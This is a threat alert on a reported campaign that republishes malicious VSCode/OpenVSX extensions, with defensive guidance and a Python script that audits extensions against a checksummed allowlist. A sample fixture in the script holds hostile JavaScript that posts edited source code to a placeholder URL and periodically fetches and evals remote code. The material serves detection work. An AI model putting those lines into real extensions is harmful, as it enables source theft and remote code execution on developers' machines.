Malicious Crypto-Stealing VSCode Extensions Resurface on OpenVSX
Category: Threat Alerts / Malware & Ransomware
BleepingComputer highlights a campaign by 'TigerJack' that abuses the VSCode and OpenVSX extension marketplaces. Extensions that were removed as malicious, such as 'C++ Playground' and 'HTTP Format', reappear under new publisher accounts. Payloads include near-real-time source-code exfiltration via onDidChangeTextDocument listeners and background CoinIMP crypto-mining. Another variant fetches and executes remote JavaScript from a hardcoded URL every 20 minutes, giving the operator arbitrary code execution without pushing a new version through the store. Because OpenVSX supplies extensions to popular VSCode-compatible editors (Cursor, Windsurf), the supply-chain exposure extends beyond Microsoft's marketplace. Developers should treat third-party extensions as untrusted code.
CORTEX Protocol Intelligence Assessment
Business Impact: Risk of source code theft, backdoors in builds, and workstation abuse for crypto-mining.
Technical Context: Extension events used for exfiltration; remote JS fetched on schedule; multi-account republishing evades takedowns.
Strategic Intelligence Guidance
- Establish allowlisted publishers; pin versions and checksum-verify extensions.
- Block network egress for IDEs by default; monitor suspicious extension behavior.
- Use sandboxed dev environments; rotate any exposed tokens/credentials.
- Prefer private extension registries for enterprise development.
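The allowlist, version-pin and checksum checks above can be turned into a routine audit of installed extensions. The script below is an added example written for this alert; it is not code from BleepingComputer, CORTEX, or any marketplace. The allowlist entries, VSIX bytes and extension sources are constructed stand-ins (a real audit would hash the downloaded .vsix file and read the extension's bundled JavaScript). The heuristics mirror the behaviours the alert describes: a text-change listener combined with outbound HTTP, and a timer combined with remote fetch and dynamic evaluation.

```python
"""Audit installed VS Code / OpenVSX extensions against a pinned, checksummed allowlist."""
import hashlib
import re
from dataclasses import dataclass


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed VSIX payloads standing in for real archive bytes (real VSIX files are zip archives).
SAMPLE_VSIX = {
    "trusted.formatter": b"PK\x03\x04 constructed trusted formatter archive v1.4.2",
    "trusted.formatter-tampered": b"PK\x03\x04 constructed archive with altered contents",
    "newacct.cpp-playground": b"PK\x03\x04 constructed lookalike archive",
}

# Allowlist pins publisher.name -> (version, sha256 of the approved VSIX). Values are constructed.
ALLOWLIST = {
    "trusted.formatter": ("1.4.2", sha256_hex(SAMPLE_VSIX["trusted.formatter"])),
}

# Static heuristics for the behaviours described in the alert. Any single hit is common in benign
# extensions; the combinations checked in audit_extension() are what merit review.
SUSPECT_PATTERNS = {
    "text-change listener": re.compile(r"\bonDidChangeTextDocument\b"),
    "outbound HTTP": re.compile(r"\b(?:https?\.request|fetch|axios)\s*\("),
    "scheduled execution": re.compile(r"\bsetInterval\s*\("),
    "dynamic evaluation": re.compile(r"\b(?:eval|new\s+Function)\s*\("),
}


@dataclass
class Extension:
    publisher: str
    name: str
    version: str
    vsix: bytes
    sources: dict  # path -> JavaScript text (constructed samples below)

    @property
    def ident(self) -> str:
        return f"{self.publisher}.{self.name}"


def audit_extension(ext: Extension) -> list:
    """Return a list of findings; an empty list means the extension passed every check."""
    findings = []
    pin = ALLOWLIST.get(ext.ident)
    if pin is None:
        findings.append(f"{ext.ident}: publisher/extension not on allowlist")
    else:
        version, digest = pin
        if ext.version != version:
            findings.append(f"{ext.ident}: version {ext.version} differs from pinned {version}")
        if sha256_hex(ext.vsix) != digest:
            findings.append(f"{ext.ident}: VSIX checksum mismatch against pinned digest")
    hits = set()
    for js in ext.sources.values():
        for label, pattern in SUSPECT_PATTERNS.items():
            if pattern.search(js):
                hits.add(label)
    if {"text-change listener", "outbound HTTP"} <= hits:
        findings.append(f"{ext.ident}: text-change listener combined with outbound HTTP (possible source exfiltration)")
    if {"scheduled execution", "outbound HTTP", "dynamic evaluation"} <= hits:
        findings.append(f"{ext.ident}: scheduled remote fetch with dynamic evaluation (remote code loading)")
    return findings


# Constructed extension inventory: one clean pin, one tampered copy, one republished lookalike.
SAMPLE_EXTENSIONS = {
    "trusted": Extension("trusted", "formatter", "1.4.2", SAMPLE_VSIX["trusted.formatter"], {
        "extension.js": "vscode.workspace.onDidChangeTextDocument(e => formatDocument(e.document));",
    }),
    "tampered": Extension("trusted", "formatter", "1.4.2", SAMPLE_VSIX["trusted.formatter-tampered"], {
        "extension.js": "vscode.workspace.onDidChangeTextDocument(e => formatDocument(e.document));",
    }),
    "lookalike": Extension("newacct", "cpp-playground", "0.0.3", SAMPLE_VSIX["newacct.cpp-playground"], {
        "extension.js": (
            "vscode.workspace.onDidChangeTextDocument(e => fetch(COLLECT_URL, {method: 'POST', body: e.document.getText()}));\n"
            "setInterval(() => fetch(UPDATE_URL).then(r => r.text()).then(src => eval(src)), 20 * 60 * 1000);"
        ),
    }),
}


def audit_all(extensions=SAMPLE_EXTENSIONS) -> dict:
    """Map each inventory key to its findings so a CI job can fail on any non-empty entry."""
    return {key: audit_extension(ext) for key, ext in extensions.items()}


if __name__ == "__main__":
    for key, findings in audit_all().items():
        print(key, "OK" if not findings else "")
        for line in findings:
            print("  -", line)
```

The checksum check is the part that catches a republished or modified package whose name and version still look right; the static heuristics only narrow down which unknown extensions to read first, and a positive hit should lead to manual review rather than automatic blocking.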
Impact
Financial: 17,000 downloads (prior variants)
Intelligence Source: Malicious crypto-stealing VSCode extensions resurface on OpenVSX | Oct 15, 2025